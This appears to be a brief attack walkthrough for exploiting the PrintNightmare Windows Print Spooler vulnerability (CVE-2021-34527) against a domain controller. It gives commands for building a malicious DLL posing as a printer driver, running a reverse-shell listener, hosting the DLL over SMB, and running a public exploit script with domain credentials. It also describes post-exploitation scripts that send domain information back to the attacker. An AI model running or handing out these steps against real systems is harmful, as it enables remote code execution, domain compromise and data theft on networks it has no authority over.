Ref: https://thedutchhacker.com/how-to-exploit-the-printnightmare-cve-2021-34527/
##Pre-exploitation
Attacker
-
Install Impacket and python script to exploit the vulnerability
-
Install metasploit (if you aren't using Kali), create a malicious dll as a faked printer driver and set up a listener on port 1443
-
Run SMB server service and modify the config file
-
Place the faked printer driver
reverse.dll(in the zipped file) to the SMB path -
Ensure the target is vulnerable to MS-RPRN (Print System Remote Protocol) by running (the vulnerability can't be exploited if the protocol isn't enabled)
rpcdump.py <username>:<password>:@<target IP addr> | grep MS-RPRN -
Exploit the PrintNightmare vulnerability to the target machine Download the python script: https://github.com/m8sec/CVE-2021-34527?tab=readme-ov-file
sudo python3 CVE-2021-34527.py -u <username> -p <password> -d <domain controller IP addr> -dll <path/path/to/maliciousdll> <domain IP addr>- Create a
uploadsandextractsfolder to retrieve files from victim machine.
Target machine
- Ensure the Domain Controller is running the Print Spooler Service and is vulnerable by checking the service
PS C:\Users\Administrator> get-service spooler
PS C:\Users\Administrator> start-service spooler**e.g. replace <username> with a domain user account login credential
Post-exploitation Download 2 scripts to discover victim DC machine and domain group info, then send them back to attacker listener.
PS Invoke-WebRequest -Uri path/to/discovery.bat -o discovery.bat
PS Invoke-WebRequest -Uri path/to/export.bat -o export.bat